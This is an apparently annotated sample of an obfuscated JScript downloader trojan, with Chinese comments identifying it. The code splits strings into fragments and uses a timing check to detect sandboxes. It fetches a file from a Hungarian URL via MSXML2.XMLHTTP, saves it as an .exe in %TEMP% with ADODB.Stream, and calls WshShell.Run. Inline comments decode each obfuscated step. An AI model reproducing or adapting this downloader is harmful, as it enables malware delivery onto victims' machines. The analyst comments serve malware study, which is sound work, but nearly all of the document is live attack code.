//经过样本分析和抓取,该恶意程序是款下载者木马。
//不懂的可以百度百科。
var uKcZJmztw = "f"; var VLjBZijBRDIxir = "sd"; var mzHiDfbVgtzWL = "uhi"; var XrxesgIWQ = "ya"; var STgtocEaUgS = "f"; var Mccq = "gsd"; var YVFRNFKC = "a7o"; var zokYxgifSUOsDIn = "d8f"; var rysGOQRkJ = "hgs"; var fAJEpxv = "7"; var LzK = "u"; var WnKggbYjhbgaYK = "dfa"; var RQJm = "s"; var tcbpCSVm = "o"; var glYioNGTMO = "a"; var cMleB = "fkj"; var guMAPaymgfr = ";l"; var aWosZJAl = "d"; var rrruwakBVMdHT = "s"; var QcfK = "a"; //asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf //--------------------------------- var wxGM = "f"; var wME = "sd"; var WYl = "hi"; var DgXr = "yau"; var OFbjPAVgdUDSr = "sdf"; var AKaUjBxV = "g"; var YWyNEBKTCAr = "a7o"; var UmkNXPoXKvV = "8f"; var jrUTHQOJCXz = "d"; var VMrAuxWTPKwLZbj = "hgs"; var hnAKwB = "au7"; var kuRwVoQ = "f"; var OXjw = "d"; var wSaGYFaTjPu = "aos"; var UdT = "j"; var wGKytuRmi = "k"; var FwSAu = ";lf"; var uSsmxvh = "d"; var xrUulSuJwZcZEin = "as";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf ////--------------------------------- var fvJysePITGsZ = "f"; var MJLm = "sd"; var OHdTWUSWyLDnD = "hi"; var NfkoHHanka = "au"; var pAJLp = "fy"; var xTeQe = "d"; var wolngRcKPNjI = "s"; var Ctd0 = "og"; var NGJpEc = "a7"; var johMrZhTBT = "f"; var rWRr = "d8"; var xhuyvlXNtG = "gs"; var AoFEsd = "7h"; var IarTKEg = "fau"; var UiCusNVVRYpV = "osd"; var SqXtHDCTAOoEfv = "ja"; var kSXJa = "k"; var AzMZQADlr = ";lf"; var OFZC = "sd"; var UFs = "a";//asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf //----------------------------------- var wiM = "ose"; var cdzFN = "l"; var gtVOEyZRPMBkY = "c";//close(); //----------------------------------- var FKqYCuGSVDKEk = "e"; var yLdfoNQSLG = "Fil"; var Kegv = "o"; var REweUeFfsfzCC = "veT"; var mCxYdwKmDTeZ = "Sa";//savetofile(); //----------------------------------- var orFCagIxftilPY = "on"; var AnB = "iti"; var OeuDh = "pos";//position //----------------------------------- var bxwfUYaplk = "e"; var ZHBIenDJhvi = "t"; var OmwNrBIs = "wri";//write() //----------------------------------- var IonAXHdnbsJsHYL = "e"; var svvPS = "typ";//type //----------------------------------- var RxDykD = "n"; var ftsB = "ope";//open //----------------------------------- var zZoO = "am"; var TSCSrKWiKQY = "tre"; var AIfn = "B.S"; var zbAsfUmIk = "D"; var uWdDgxvOZcUG = "O"; var MUSaOvH = "D"; var YZVOwlzLPfausz = "A";//"adodb.stream" //----------------------------------- var pNGkr = "ct"; var iqPSquxJgp = "je"; var bTJnufjW = "b"; var lIexL = "teO"; var kZBJ = "rea"; var derqHNng = "C";//creatobject("adodb.stream") var LiTxpjAMHxAgUQ = "4h4"; var WWzPWldMX = "6n"; var CuF0 = "k6j"; var oUHbKSEqhF = "0"; var lQP = "hu/"; var RQUOidonsf = "l."; var NjKvurbzu = "ta"; var CSyCCMfj = "por"; var XcTxpkvH = "egy"; var aUucLqfydBnSn = "j"; var lTXzk = "ev"; var mpAARoVfxvEsej = ".n"; var NVJeSNhziHjX = "www"; var JFDhyk = "://"; var CFpmRSiBsMp = "p"; var rKP = "htt";//http://www.nevjegyportal.hu/ok6j6n4h4 //----------------------------------- var uBtUfBIHbmz = "T"; var LwKK = "GE";// get //----------------------------------- var KRPXN = "pen"; var HrNtkpOuBMYa = "o";//open //----------------------------------- var OFdMpJOyw = "e"; var NlpqQU = "x"; var cZpOdxEyvqRfb = "7.e"; var cLfbaiuobq = "PO"; var XmXyEnhbtWhG = "M1"; var DQZEGAm = "ko"; var cKoUGmrGJtE = "SE"; var QasyJ = "Ky";//KySEKoM1PO7.exe //----------------------------------- var eQyCEVqQUazI = "%/"; var tNgKCALxxEpJMf = "P"; var mNYqbv = "M"; var FrwlCZOPjcmJvoE = "E"; var KyNfXZkSc = "%T";//%TEMP%/ //----------------------------------- var AjbjrFWcHO = "gs"; var RyW = "in"; var LVlachWJa = "Str"; var NGjUy = "t"; var ZXMail = "n"; var XLaaPawDhGaz = "e"; var lRTf = "m"; var EGxwfaNKp = "ron"; var UCOpd = "vi"; var xZQvOWiNMG = "n"; var NLgbSPQIDLAIj = "ndE"; var Gyo = "xpa"; var gPYeoLnn = "E";//expendenvironmentstrings //----------------------------------- var kpsxpufDRzihIGv = "TP"; var vGOfgZZdOVh = "T"; var wJOAaSUgz = "LH"; var bPhWMdYs = "XM"; var AwpqZN = "2."; var RNVidTrApbBfHO = "XML"; var ynXoQhqDiQydxVe = "MS";//msxml2.xmlhttp //----------------------------------- var zkeMzwunlwoMdUD = "n"; var oVQABSTeJWqKG = "Ru"; var WkRVEzGFpaMCAC = "ell"; var AoJg = "h"; var HDveUfs = "S"; var PGItzPyn = "."; var iTVqHxcrEbduDt = "t"; var wxGWFQyhW = "rip"; var KDSFP = "c"; var nzV = "WS";//wscript.shell.run() //----------------------------------- var NFFhujLOFwsUs = "ct"; var kvZBOvoVgLSEG = "je"; var DXP = "b"; var zjRmzjunjFUys = "O"; var EcDMPFvaxG = "e"; var stMA = "at"; var KnALPhmOVixZ = "Cre";//createobject() //----------------------------------- var aCTc = new Date(); var SZT0 = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var bRDtyPAQicD = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var VrU = aCTc.getMilliseconds(); WScript.Sleep(10); var aCTc = new Date(); var DEyWdL = aCTc.getMilliseconds(); // var NdNAj = bRDtyPAQicD - SZT0; //var NdNAj=new Date().getMilliseconds()-new Date().getMilliseconds(); // // 10s var HRORMjJ = VrU - bRDtyPAQicD; // 10s var YSc0 = DEyWdL - VrU; // 10s WshShell = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](nzV + KDSFP + wxGWFQyhW + iTVqHxcrEbduDt + PGItzPyn + HDveUfs + AoJg + WkRVEzGFpaMCAC); //wshShell=wscript[createobject](wscript.shell.run); function jmljvNFWjSplH(NLN){WshShell[oVQABSTeJWqKG + zkeMzwunlwoMdUD](NLN, 0, 0);} //function jmljvNFWjSplH(NLN) //{ // WshShell[run](NLN,0,0); //} function OcEOsFHpWS(n){return ynXoQhqDiQydxVe + RNVidTrApbBfHO + AwpqZN + bPhWMdYs + wJOAaSUgz + vGOfgZZdOVh + kpsxpufDRzihIGv;} //function OcEOsFHpWS(n) //{ // return MSxml2.xmlhttp; //} if ((NdNAj != HRORMjJ) || (HRORMjJ != YSc0)){fOikDMmzwkAuGlw = WshShell[gPYeoLnn + Gyo + NLgbSPQIDLAIj + xZQvOWiNMG + UCOpd + EGxwfaNKp + lRTf + XLaaPawDhGaz + ZXMail + NGjUy + LVlachWJa + RyW + AjbjrFWcHO](KyNfXZkSc + FrwlCZOPjcmJvoE + mNYqbv + tNgKCALxxEpJMf + eQyCEVqQUazI) + QasyJ + cKoUGmrGJtE + DQZEGAm + XmXyEnhbtWhG + cLfbaiuobq + cZpOdxEyvqRfb + NlpqQU + OFdMpJOyw; //fOikDMmzwkAuGlw=/%temp%/ path //WshShell[expendedenvironmentstrings](%temp%); EFASPqJ = OcEOsFHpWS(0); //var xmlHTTP=new ActiveObject("Microsoft.XMLHTTP"); wMRqfsrlJdPwT = WScript.CreateObject(EFASPqJ); // //xmlhttp object //[HrNtkpOuBMYa + KRPXN]==open wMRqfsrlJdPwT[HrNtkpOuBMYa + KRPXN](LwKK + uBtUfBIHbmz, rKP + CFpmRSiBsMp + JFDhyk + NVJeSNhziHjX + mpAARoVfxvEsej + lTXzk + aUucLqfydBnSn + XcTxpkvH + CSyCCMfj + NjKvurbzu + RQUOidonsf + lQP + oUHbKSEqhF + CuF0 + WWzPWldMX + LiTxpjAMHxAgUQ, false); //wMRqfsrlJdPwT(get,http://www.nevjegyportal.hu/ok6j6n4h4,false); //xmlhttp.open("get","url",false); wMRqfsrlJdPwT.send(); while (wMRqfsrlJdPwT.readystate < 4 ) {WScript.Sleep(1000)}; //readystate elcHu = WScript[KnALPhmOVixZ + stMA + EcDMPFvaxG + zjRmzjunjFUys + DXP + kvZBOvoVgLSEG + NFFhujLOFwsUs](YZVOwlzLPfausz + MUSaOvH + uWdDgxvOZcUG + zbAsfUmIk + AIfn + TSCSrKWiKQY + zZoO); //var adoStream=createobject("adodb.stream"); elcHu[HrNtkpOuBMYa + KRPXN](); //adoStream.open(); elcHu[svvPS + IonAXHdnbsJsHYL] = 1; //adoStream.type=1; elcHu[OmwNrBIs + ZHBIenDJhvi + bxwfUYaplk](wMRqfsrlJdPwT.ResponseBody); //adoStream.write(wMRqfsrlJdPwT.ResponseBody); elcHu[OeuDh + AnB + orFCagIxftilPY] = 0; //adoStream.position=0; elcHu[mCxYdwKmDTeZ + REweUeFfsfzCC + Kegv + yLdfoNQSLG + FKqYCuGSVDKEk](fOikDMmzwkAuGlw, 2 ); //adoStream.savetofile(/%temp%/,2); elcHu[gtVOEyZRPMBkY + cdzFN + wiM](); //adoStream.close(); // jmljvNFWjSplH("/%temp%/"); //WshShell[run](NLN,0,0) NdNAj = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds();; //10s HRORMjJ = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + VrU + bRDtyPAQicD; //new Date().getMilliseconds() - new Date().getMilliseconds()="asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + new Date().getMilliseconds() + new Date().getMilliseconds(); //10s YSc0 = "asd;lfkjaosdfau7hgsd8fa7ogsdfyauhisdf" + DEyWdL + VrU; //10s }